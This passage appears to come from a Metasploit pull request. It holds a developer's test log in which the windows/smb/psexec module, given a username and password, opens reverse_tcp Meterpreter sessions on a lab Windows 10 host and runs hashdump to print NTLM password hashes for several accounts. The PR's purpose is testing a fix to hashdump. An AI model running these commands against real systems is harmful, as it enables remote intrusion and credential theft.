[*] 192.168.123.141:445 - Executing the payload...
[+] 192.168.123.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (488696 bytes) to 192.168.123.141
[*] Meterpreter session 13 opened (192.168.123.1:4444 -> 192.168.123.141:62014) at 2023-04-27 17:40:44 +0100

meterpreter > hashdump
admin:1005:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1006:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Alan David Foster:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
basic_user:1007:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
foo:1003:aad3b435b51404eeaad3b435b51404ee:ac8e657f83df82beea5d43bdaf7800cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test_user:1002:aad3b435b51404eeaad3b435b51404ee:066ddfd4ef0e9cd7c256fe77191ef43c:::
user:1004:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:19ce80797959fdfb522f09643d79aa26:::

Mingw Windows 10 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.141 username=admin password=password123 payload=windows/x64/meterpreter/reverse_tcp
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.141:445 - Connecting to the server...
[*] 192.168.123.141:445 - Authenticating to 192.168.123.141:445 as user 'admin'...
[*] 192.168.123.141:445 - Selecting PowerShell target
[*] 192.168.123.141:445 - Executing the payload...
[+] 192.168.123.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (554937 bytes) to 192.168.123.141
[*] Meterpreter session 14 opened (192.168.123.1:4444 -> 192.168.123.141:62016) at 2023-04-27 17:41:19 +0100

meterpreter > hashdump
admin:1005:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1006:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Alan David Foster:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
basic_user:1007:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
foo:1003:aad3b435b51404eeaad3b435b51404ee:ac8e657f83df82beea5d43bdaf7800cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test_user:1002:aad3b435b51404eeaad3b435b51404ee:066ddfd4ef0e9cd7c256fe77191ef43c:::
user:1004:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:19ce80797959fdfb522f09643d79aa26:::

@adfoster-r7 (Contributor)

Tested against a larger DC with 1k+ users; I think that's everything tested now - will land

Successfully merging this pull request may close these issues.

Fix or improve UX of hashdump on 32 bit meterpreter on 64 bit host